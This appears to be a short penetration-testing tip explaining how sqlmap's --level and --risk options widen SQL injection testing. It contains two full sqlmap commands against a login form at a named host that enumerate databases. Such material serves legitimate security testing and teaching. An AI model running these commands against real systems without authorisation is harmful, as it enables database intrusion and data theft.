Using the "--level" and "--risk" parameters makes sqlmap launch more test cases, which raises the scanning success rate.
For instance, below is an ordinary scanning command:
# sqlmap -u http://sql1.webapp.site/login.php --data='username=test&password=test&submit=Login' -p username --dbs
With the command above, the chance of getting any useful information may not be high. However, if you try:
# sqlmap -u http://sql1.webapp.site/login.php --data='username=test&password=test&submit=Login' -p username --level 3 --risk 3 --dbs
You may get what you want directly.
To recap, the parameter "--level" (ranges from 1 to 5) defines the number of checks/payloads to be performed, and the parameter "--risk" (ranges from 1 to 3) reflects the type of payloads being used.